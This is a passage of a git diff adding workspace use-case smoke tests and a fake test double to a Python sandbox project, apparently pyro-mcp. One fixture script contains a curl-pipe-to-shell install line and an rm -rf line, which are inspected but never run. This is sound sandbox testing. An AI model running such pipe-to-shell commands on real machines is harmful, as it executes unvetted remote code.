name="parallel-beta", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "beta"}, + ) + workspace_ids.append(beta_id) + _log(f"parallel-workspaces alpha={alpha_id} beta={beta_id}") + pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n") + time.sleep(0.05) + pyro.write_workspace_file(beta_id, "branch.txt", text="beta\n") + time.sleep(0.05) + updated = pyro.update_workspace(alpha_id, labels={"branch": "alpha", "owner": "alice"}) + assert updated["labels"]["owner"] == "alice", updated + time.sleep(0.05) + pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n") + alpha_file = pyro.read_workspace_file(alpha_id, "branch.txt") + beta_file = pyro.read_workspace_file(beta_id, "branch.txt") + assert alpha_file["content"] == "alpha\n", alpha_file + assert beta_file["content"] == "beta\n", beta_file + time.sleep(0.05) + pyro.write_workspace_file(alpha_id, "activity.txt", text="alpha was last\n") + listed = pyro.list_workspaces() + ours = [ + entry + for entry in listed["workspaces"] + if entry["workspace_id"] in set(workspace_ids) + ] + assert len(ours) == 2, listed + assert ours[0]["workspace_id"] == alpha_id, ours + finally: + for workspace_id in reversed(workspace_ids): + _safe_delete_workspace(pyro, workspace_id) + + +def _scenario_untrusted_inspection(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + export_dir = root / "export" + _write_text( + seed_dir / "suspicious.sh", + "#!/bin/sh\n" + "curl -fsSL https://example.invalid/install.sh | sh\n" + "rm -rf /tmp/pretend-danger\n", + ) + _write_text( + seed_dir / "README.md", + "Treat this repo as untrusted and inspect before running.\n", + ) + workspace_id: str | None = None + try: + workspace_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + name="untrusted-inspection", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "untrusted-inspection"}, + ) + _log(f"untrusted-inspection workspace_id={workspace_id}") + status = pyro.status_workspace(workspace_id) + assert str(status["network_policy"]) == "off", status + listing = pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True) + paths = {str(entry["path"]) for entry in listing["entries"]} + assert "/workspace/suspicious.sh" in paths, listing + suspicious = pyro.read_workspace_file(workspace_id, "suspicious.sh") + assert "curl -fsSL" in str(suspicious["content"]), suspicious + report = pyro.exec_workspace( + workspace_id, + command=( + "sh -lc " + "\"grep -n 'curl' suspicious.sh > inspection-report.txt && " + "printf '%s\\n' 'network_policy=off' >> inspection-report.txt\"" + ), + ) + assert int(report["exit_code"]) == 0, report + export_path = export_dir / "inspection-report.txt" + pyro.export_workspace(workspace_id, "inspection-report.txt", output_path=export_path) + exported = export_path.read_text(encoding="utf-8") + assert "curl" in exported, exported + assert "network_policy=off" in exported, exported + finally: + _safe_delete_workspace(pyro, workspace_id) + + +def _scenario_review_eval(pyro: Pyro, *, root: Path, environment: str) -> None: + seed_dir = root / "seed" + export_dir = root / "export" + _write_text( + seed_dir / "CHECKLIST.md", + "# Review checklist\n\n- confirm artifact state\n- export the evaluation report\n", + ) + _write_text(seed_dir / "artifact.txt", "PASS\n") + _write_text( + seed_dir / "review.sh", + "#!/bin/sh\n" + "set -eu\n" + "if grep -qx 'PASS' artifact.txt; then\n" + " printf '%s\\n' 'review=pass' > review-report.txt\n" + " printf '%s\\n' 'review passed'\n" + "else\n" + " printf '%s\\n' 'review=fail' > review-report.txt\n" + " printf '%s\\n' 'review failed' >&2\n" + " exit 1\n" + "fi\n", + ) + workspace_id: str | None = None + shell_id: str | None = None + try: + workspace_id = _create_workspace( + pyro, + environment=environment, + seed_path=seed_dir, + name="review-eval", + labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "review-eval"}, + ) + _log(f"review-eval workspace_id={workspace_id}") + baseline_snapshot = pyro.create_snapshot(workspace_id, "pre-review") + assert baseline_snapshot["snapshot"]["snapshot_name"] == "pre-review", baseline_snapshot + shell = pyro.open_shell(workspace_id) + shell_id = str(shell["shell_id"]) + initial = pyro.read_shell( + workspace_id, + shell_id, + cursor=0, + plain=True, + wait_for_idle_ms=300, + ) + pyro.write_shell(workspace_id, shell_id, input="cat CHECKLIST.md") + read = pyro.read_shell( + workspace_id, + shell_id, + cursor=int(initial["next_cursor"]), + plain=True, + wait_for_idle_ms=300, + ) + assert "Review checklist" in str(read["output"]), read + closed = pyro.close_shell(workspace_id, shell_id) + assert bool(closed["closed"]) is True, closed + shell_id = None + evaluation = pyro.exec_workspace(workspace_id, command="sh review.sh") + assert int(evaluation["exit_code"]) == 0, evaluation + pyro.write_workspace_file(workspace_id, "artifact.txt", text="FAIL\n") + reset = pyro.reset_workspace(workspace_id, snapshot="pre-review") + assert reset["workspace_reset"]["snapshot_name"] == "pre-review", reset + artifact = pyro.read_workspace_file(workspace_id, "artifact.txt") + assert artifact["content"] == "PASS\n", artifact + export_path = export_dir / "review-report.txt" + rerun = pyro.exec_workspace(workspace_id, command="sh review.sh") + assert int(rerun["exit_code"]) == 0, rerun + pyro.export_workspace(workspace_id, "review-report.txt", output_path=export_path) + assert export_path.read_text(encoding="utf-8") == "review=pass\n" + finally: + if shell_id is not None and workspace_id is not None: + try: + pyro.close_shell(workspace_id, shell_id) + except Exception: + pass + _safe_delete_workspace(pyro, workspace_id) + + +_SCENARIO_RUNNERS: Final[dict[str, ScenarioRunner]] = { + "cold-start-validation": _scenario_cold_start_validation, + "repro-fix-loop": _scenario_repro_fix_loop, + "parallel-workspaces": _scenario_parallel_workspaces, + "untrusted-inspection": _scenario_untrusted_inspection, + "review-eval": _scenario_review_eval, +} + + +def run_workspace_use_case_scenario( + scenario: str, + *, + environment: str = DEFAULT_USE_CASE_ENVIRONMENT, +) -> None: + if scenario not in USE_CASE_CHOICES: + expected = ", ".join(USE_CASE_CHOICES) + raise ValueError(f"unknown use-case scenario {scenario!r}; expected one of: {expected}") + + pyro = Pyro() + with tempfile.TemporaryDirectory(prefix="pyro-workspace-use-case-") as temp_dir: + root = Path(temp_dir) + scenario_names = USE_CASE_SCENARIOS if scenario == USE_CASE_ALL_SCENARIO else (scenario,) + for scenario_name in scenario_names: + recipe = _RECIPE_BY_SCENARIO[scenario_name] + _log(f"starting {recipe.scenario} ({recipe.title}) profile={recipe.profile}") + scenario_root = root / scenario_name + scenario_root.mkdir(parents=True, exist_ok=True) + runner = _SCENARIO_RUNNERS[scenario_name] + runner(pyro, root=scenario_root, environment=environment) + _log(f"completed {recipe.scenario}") + + +def build_arg_parser() -> argparse.ArgumentParser: + parser = argparse.ArgumentParser( + prog="workspace_use_case_smoke", + description="Run real guest-backed workspace use-case smoke scenarios.", + ) + parser.add_argument( + "--scenario", + choices=USE_CASE_CHOICES, + default=USE_CASE_ALL_SCENARIO, + help="Use-case scenario to run. Defaults to all scenarios.", + ) + parser.add_argument( + "--environment", + default=DEFAULT_USE_CASE_ENVIRONMENT, + help="Curated environment to use for the workspace scenarios.", + ) + return parser + + +def main() -> None: + args = build_arg_parser().parse_args() + run_workspace_use_case_scenario( + str(args.scenario), + environment=str(args.environment), + ) + + +if __name__ == "__main__": + main() diff --git a/tests/test_vm_manager.py b/tests/test_vm_manager.py index df83a80..f8010d3 100644 --- a/tests/test_vm_manager.py +++ b/tests/test_vm_manager.py @@ -730,8 +730,13 @@ def test_workspace_file_ops_and_patch_round_trip(tmp_path: Path) -> None: } ] + status_before_read = manager.status_workspace(workspace_id) read_payload = manager.read_workspace_file(workspace_id, "src/app.py") assert read_payload["content"] == 'print("bug")\n' + status_after_read = manager.status_workspace(workspace_id) + assert float(status_after_read["last_activity_at"]) == float( + status_before_read["last_activity_at"] + ) written = manager.write_workspace_file( workspace_id, diff --git a/tests/test_workspace_use_case_smokes.py b/tests/test_workspace_use_case_smokes.py new file mode 100644 index 0000000..5cd648c --- /dev/null +++ b/tests/test_workspace_use_case_smokes.py @@ -0,0 +1,509 @@ +from __future__ import annotations + +import shutil +import time as time_module +from dataclasses import dataclass, field +from pathlib import Path +from typing import Any, cast + +import pytest + +import pyro_mcp.workspace_use_case_smokes as smoke_module +from pyro_mcp.workspace_use_case_smokes import ( + USE_CASE_ALL_SCENARIO, + USE_CASE_CHOICES, + USE_CASE_SCENARIOS, + WORKSPACE_USE_CASE_RECIPES, + build_arg_parser, +) + + +def _repo_root() -> Path: + return Path(__file__).resolve().parents[1] + + +@dataclass +class _FakeShell: + cwd: str = "/workspace" + buffer: str = "" + cursor: int = 0 + closed: bool = False + + +@dataclass +class _FakeWorkspace: + workspace_id: str + root: Path + baseline_root: Path + environment: str + network_policy: str + name: str | None + labels: dict[str, str] + created_at: float + last_activity_at: float + reset_count: int = 0 + snapshots: dict[str, Path] = field(default_factory=dict) + services: dict[str, dict[str, Any]] = field(default_factory=dict) + shells: dict[str, _FakeShell] = field(default_factory=dict) + + +class _FakePyro: + def __init__(self, root: Path) -> None: + self._root = root + self._workspaces: dict[str, _FakeWorkspace] = {} + self._workspace_counter = 0 + self._shell_counter = 0 + self._clock = 0.0 + + def _tick(self) -> float: + self._clock += 1.0 + return self._clock + + def _workspace_dir(self, workspace_id: str) -> Path: + return self._root / workspace_id + + def _resolve_workspace(self, workspace_id: str) -> _FakeWorkspace: + return self._workspaces[workspace_id] + + def _workspace_path(self, workspace: _FakeWorkspace, path: str) -> Path: + if path.startswith("/workspace/"): + relative = path.removeprefix("/workspace/") + elif path == "/workspace": + relative = "" + else: + relative = path + return workspace.root / relative + + def _copy_tree_contents(self, source: Path, destination: Path) -> None: + destination.mkdir(parents=True, exist_ok=True) + for child in source.iterdir(): + target = destination / child.name + if child.is_dir(): + shutil.copytree(child, target) + else: + shutil.copy2(child, target) + + def _reset_tree(self, destination: Path, source: Path) -> None: + if destination.exists(): + shutil.rmtree(destination) + shutil.copytree(source, destination) + + def _diff_changed(self, workspace: _FakeWorkspace) -> bool: + current_paths = { + path.relative_to(workspace.root) + for path in workspace.root.rglob("*") + if path.is_file() + } + baseline_paths = { + path.relative_to(workspace.baseline_root) + for path in workspace.baseline_root.rglob("*") + if path.is_file() + } + if current_paths != baseline_paths: + return True + for relative in current_paths: + if ( + (workspace.root / relative).read_bytes() + != (workspace.baseline_root / relative).read_bytes() + ): + return True + return False + + def create_workspace( + self, + *, + environment: str, + seed_path: Path, + name: str | None = None, + labels: dict[str, str] | None = None, + network_policy: str = "off", + ) -> dict[str, Any]: + self._workspace_counter += 1 + workspace_id = f"ws-{self._workspace_counter}" + workspace_dir = self._workspace_dir(workspace_id) + workspace_root = workspace_dir / "workspace" + baseline_root = workspace_dir / "baseline" + self._copy_tree_contents(Path(seed_path), workspace_root) + self._copy_tree_contents(Path(seed_path), baseline_root) + stamp = self._tick() + workspace = _FakeWorkspace( + workspace_id=workspace_id, + root=workspace_root, + baseline_root=baseline_root, + environment=environment, + network_policy=network_policy, + name=name, + labels=dict(labels or {}), + created_at=stamp, + last_activity_at=stamp, + ) + workspace.snapshots["baseline"] = baseline_root + self._workspaces[workspace_id] = workspace + return {"workspace_id": workspace_id} + + def delete_workspace(self, workspace_id: str) -> dict[str, Any]: + workspace = self._workspaces.pop(workspace_id) + shutil.rmtree(self._workspace_dir(workspace.workspace_id), ignore_errors=True) + return {"workspace_id": workspace_id, "deleted": True} + + def status_workspace(self, workspace_id: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + return { + "workspace_id": workspace_id, + "network_policy": workspace.network_policy, + "name": workspace.name, + "labels": dict(workspace.labels), + "last_activity_at": workspace.last_activity_at, + } + + def update_workspace(self, workspace_id: str, *, labels: dict[str, str]) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + workspace.labels.update(labels) + workspace.last_activity_at = self._tick() + return {"workspace_id": workspace_id, "labels": dict(workspace.labels)} + + def list_workspaces(self) -> dict[str, Any]: + workspaces = sorted( + self._workspaces.values(), + key=lambda item: (-item.last_activity_at, -item.created_at, item.workspace_id), + ) + return { + "count": len(workspaces), + "workspaces": [ + { + "workspace_id": workspace.workspace_id, + "name": workspace.name, + "labels": dict(workspace.labels), + "environment": workspace.environment, + "state": "started", + "created_at": workspace.created_at, + "last_activity_at": workspace.last_activity_at, + "expires_at": workspace.created_at + 3600, + "command_count": 0, + "service_count": len(workspace.services), + "running_service_count": sum( + 1 + for service in workspace.services.values() + if service["state"] == "running" + ), + } + for workspace in workspaces + ], + } + + def exec_workspace(self, workspace_id: str, *, command: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + root = workspace.root + stdout = "" + stderr = "" + exit_code = 0 + if command == "sh validate.sh": + (root / "validation-report.txt").write_text("validation=pass\n", encoding="utf-8") + stdout = "validated\n" + elif command == "sh check.sh": + value = (root / "message.txt").read_text(encoding="utf-8").strip() + if value == "fixed": + stdout = "fixed\n" + else: + stderr = f"expected fixed got {value}\n" + exit_code = 1 + elif command == "sh -lc 'test -f .app-ready && cat service-state.txt'": + stdout = (root / "service-state.txt").read_text(encoding="utf-8") + elif "inspection-report.txt" in command: + suspicious = (root / "suspicious.sh").read_text(encoding="utf-8").splitlines() + report_lines = [ + f"{index}:curl" + for index, line in enumerate(suspicious, start=1) + if "curl" in line + ] + report_lines.append("network_policy=off") + (root / "inspection-report.txt").write_text( + "\n".join(report_lines) + "\n", + encoding="utf-8", + ) + elif command == "sh review.sh": + artifact = (root / "artifact.txt").read_text(encoding="utf-8").strip() + if artifact == "PASS": + (root / "review-report.txt").write_text("review=pass\n", encoding="utf-8") + stdout = "review passed\n" + else: + (root / "review-report.txt").write_text("review=fail\n", encoding="utf-8") + stderr = "review failed\n" + exit_code = 1 + else: + raise AssertionError(f"unexpected exec command: {command}") + workspace.last_activity_at = self._tick() + return { + "workspace_id": workspace_id, + "exit_code": exit_code, + "stdout": stdout, + "stderr": stderr, + "execution_mode": "guest_vsock", + } + + def start_service( + self, + workspace_id: str, + service_name: str, + *, + command: str, + readiness: dict[str, Any] | None = None, + ) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + if command == "sh serve.sh": + (workspace.root / "service-state.txt").write_text("service=ready\n", encoding="utf-8") + (workspace.root / ".app-ready").write_text("", encoding="utf-8") + stdout = "service started\n" + else: + stdout = "" + workspace.services[service_name] = { + "state": "running", + "stdout": stdout, + "readiness": readiness, + } + workspace.last_activity_at = self._tick() + return { + "workspace_id": workspace_id, + "service_name": service_name, + "state": "running", + "command": command, + "cwd": "/workspace", + "execution_mode": "guest_vsock", + "readiness": readiness, + } + + def logs_service( + self, + workspace_id: str, + service_name: str, + *, + tail_lines: int = 200, + ) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + service = workspace.services[service_name] + return { + "workspace_id": workspace_id, + "service_name": service_name, + "state": service["state"], + "stdout": service["stdout"], + "stderr": "", + "tail_lines": tail_lines, + "truncated": False, + } + + def stop_service(self, workspace_id: str, service_name: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + workspace.services[service_name]["state"] = "stopped" + workspace.last_activity_at = self._tick() + return {"workspace_id": workspace_id, "service_name": service_name, "state": "stopped"} + + def list_workspace_files( + self, workspace_id: str, *, path: str = "/workspace", recursive: bool = False + ) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + target = self._workspace_path(workspace, path) + entries: list[dict[str, Any]] = [] + iterable = target.rglob("*") if recursive else target.iterdir() + for entry in iterable: + artifact_type = "directory" if entry.is_dir() else "file" + entries.append( + { + "path": f"/workspace/{entry.relative_to(workspace.root)}", + "artifact_type": artifact_type, + "size_bytes": entry.stat().st_size if entry.is_file() else 0, + "link_target": None, + } + ) + return {"workspace_id": workspace_id, "entries": entries} + + def read_workspace_file(self, workspace_id: str, path: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + target = self._workspace_path(workspace, path) + content = target.read_text(encoding="utf-8") + return {"workspace_id": workspace_id, "path": path, "content": content} + + def write_workspace_file(self, workspace_id: str, path: str, *, text: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + target = self._workspace_path(workspace, path) + target.parent.mkdir(parents=True, exist_ok=True) + target.write_text(text, encoding="utf-8") + workspace.last_activity_at = self._tick() + return {"workspace_id": workspace_id, "path": path, "bytes_written": len(text.encode())} + + def apply_workspace_patch(self, workspace_id: str, *, patch: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + target = workspace.root / "message.txt" + original = target.read_text(encoding="utf-8") + updated = original.replace("broken\n", "fixed\n") + target.write_text(updated, encoding="utf-8") + workspace.last_activity_at = self._tick() + return {"workspace_id": workspace_id, "changed": updated != original, "patch": patch} + + def diff_workspace(self, workspace_id: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + return {"workspace_id": workspace_id, "changed": self._diff_changed(workspace)} + + def export_workspace( + self, + workspace_id: str, + path: str, + *, + output_path: Path, + ) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + source = self._workspace_path(workspace, path) + output_path = Path(output_path) + output_path.parent.mkdir(parents=True, exist_ok=True) + if source.is_dir(): + shutil.copytree(source, output_path) + artifact_type = "directory" + else: + shutil.copy2(source, output_path) + artifact_type = "file" + return { + "workspace_id": workspace_id, + "workspace_path": path, + "output_path": str(output_path), + "artifact_type": artifact_type, + } + + def create_snapshot(self, workspace_id: str, snapshot_name: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + snapshot_root = self._workspace_dir(workspace_id) / f"snapshot-{snapshot_name}" + self._reset_tree(snapshot_root, workspace.root) + workspace.snapshots[snapshot_name] = snapshot_root + return { + "workspace_id": workspace_id, + "snapshot": {"snapshot_name": snapshot_name, "kind": "named"}, + } + + def reset_workspace(self, workspace_id: str, *, snapshot: str = "baseline") -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + source = workspace.snapshots[snapshot] + self._reset_tree(workspace.root, source) + workspace.reset_count += 1 + workspace.last_activity_at = self._tick() + return { + "workspace_id": workspace_id, + "reset_count": workspace.reset_count, + "workspace_reset": {"snapshot_name": snapshot}, + } + + def open_shell(self, workspace_id: str, **_: Any) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + self._shell_counter += 1 + shell_id = f"shell-{self._shell_counter}" + workspace.shells[shell_id] = _FakeShell() + return {"workspace_id": workspace_id, "shell_id": shell_id, "state": "running"} + + def read_shell( + self, + workspace_id: str, + shell_id: str, + *, + cursor: int = 0, + plain: bool = False, + wait_for_idle_ms: int | None = None, + ) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + shell = workspace.shells[shell_id] + output = shell.buffer[cursor:] + next_cursor = len(shell.buffer) + return { + "workspace_id": workspace_id, + "shell_id": shell_id, + "state": "running", + "cursor": cursor, + "next_cursor": next_cursor, + "output": output, + "plain": plain, + "wait_for_idle_ms": wait_for_idle_ms, + "truncated": False, + } + + def write_shell(self, workspace_id: str, shell_id: str, *, input: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + shell = workspace.shells[shell_id] + if input == "cat CHECKLIST.md": + shell.buffer += (workspace.root / "CHECKLIST.md").read_text(encoding="utf-8") + workspace.last_activity_at = self._tick() + return {"workspace_id": workspace_id, "shell_id": shell_id} + + def close_shell(self, workspace_id: str, shell_id: str) -> dict[str, Any]: + workspace = self._resolve_workspace(workspace_id) + workspace.shells.pop(shell_id, None) + return {"workspace_id": workspace_id, "shell_id": shell_id, "closed": True} + + +def test_use_case_registry_has_expected_scenarios() -> None: + expected = ( + "cold-start-validation", + "repro-fix-loop", + "parallel-workspaces", + "untrusted-inspection", + "review-eval", + ) + assert USE_CASE_SCENARIOS == expected + assert USE_CASE_CHOICES == expected + (USE_CASE_ALL_SCENARIO,) + assert tuple(recipe.scenario for recipe in WORKSPACE_USE_CASE_RECIPES) == expected + + +def test_use_case_docs_and_targets_stay_aligned() -> None: + repo_root = _repo_root() + index_text = (repo_root / "docs" / "use-cases" / "README.md").read_text(encoding="utf-8") + makefile_text = (repo_root / "Makefile").read_text(encoding="utf-8") + for recipe in WORKSPACE_USE_CASE_RECIPES: + assert (repo_root / recipe.doc_path).is_file(), recipe.doc_path + recipe_text = (repo_root / recipe.doc_path).read_text(encoding="utf-8") + assert recipe.smoke_target in index_text + assert recipe.doc_path.rsplit("/", 1)[-1] in index_text + assert recipe.profile in recipe_text + assert recipe.smoke_target in recipe_text + assert f"{recipe.smoke_target}:" in makefile_text + + +def test_use_case_parser_exposes_all_scenarios() -> None: + parser = build_arg_parser() + scenario_action = next( + action for action in parser._actions if getattr(action, "dest", None) == "scenario" + ) + choices = cast(tuple[Any, ...], scenario_action.choices) + assert tuple(choices) == USE_CASE_CHOICES + + +def test_run_all_use_case_scenarios_with_fake_pyro( + monkeypatch: pytest.MonkeyPatch, + tmp_path: Path, +) -> None: + fake_pyro = _FakePyro(tmp_path / "fake-pyro") + monkeypatch.setattr(smoke_module, "Pyro", lambda: fake_pyro) + monkeypatch.setattr(time_module, "sleep", lambda _seconds: None) + + smoke_module.run_workspace_use_case_scenario("all") + + assert fake_pyro._workspaces == {} + + +def test_run_workspace_use_case_scenario_rejects_unknown() -> None: + with pytest.raises(ValueError, match="unknown use-case scenario"): + smoke_module.run_workspace_use_case_scenario("not-a-scenario") + + +def test_main_runs_selected_scenario(monkeypatch: pytest.MonkeyPatch, tmp_path: Path) -> None: + fake_pyro = _FakePyro(tmp_path / "fake-pyro-main") + monkeypatch.setattr(smoke_module, "Pyro", lambda: fake_pyro) + monkeypatch.setattr(time_module, "sleep", lambda _seconds: None) + monkeypatch.setattr( + "sys.argv", + [ + "workspace_use_case_smoke", + "--scenario", + "repro-fix-loop", + "--environment", + "debian:12", + ], + ) + + smoke_module.main() + + assert fake_pyro._workspaces == {} diff --git a/uv.lock b/uv.lock index 383d764..4bcd624 100644 --- a/uv.lock +++ b/uv.lock @@ -706,7 +706,7 @@ crypto = [ [[package]] name = "pyro-mcp" -version = "3.5.0" +version = "3.6.0" source = { editable = "." } dependencies = [ { name = "mcp" },